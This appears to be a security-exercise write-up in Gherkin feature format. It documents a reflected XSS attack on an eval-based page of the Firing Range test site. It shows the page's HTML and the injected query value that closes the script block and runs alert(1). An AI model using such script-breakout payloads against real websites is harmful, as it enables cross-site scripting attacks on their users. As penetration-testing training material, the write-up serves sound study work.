# language: en

Feature: Escaped XSS - JS Eval
  From the Firing Range system

  Background:
    Given I'm running Debian GNU/Linux 9 (stretch)
    And also using Chrome Version 69.0.3497.81
    Given the following scenario
    """
    URL: https://public-firing-range.appspot.com/escape/js/html_escape?q=a
    Message: Eval payload after escaping <, & and >()
    Details:
      - The page shows an 'a' on the top
    Objective: Perform an reflected xss on the eval function of the page
    """
    Scenario: HTML injection attempt
    Given the following HTML code for the page
    """
    <html>
      <body>
        <script>eval('a'.replace(/</g, '&lt;')
                                  .replace(/&/g, '&amp;')
                                  .replace(/>/g, '&gt;'));
        </script>
      </body>
    </html>

    """
    When I see the URL noticed that 'q' parameter is the content of the body
    And  I replace the 'q' parameter by the following code in html
    """
    q=</script><script>alert(1)</script><!--
    """
    Then the page was reloaded with our XSS injection
    """
      <html>
        <body>
          <script>eval('</script><script>alert(1)</script>
          <!--'.replace(/</g, '&lt;')
                                    .replace(/&/g, '&amp;')
                                    .replace(/>/g, '&gt;'));
          </script>
        </body>
      </html>

    """
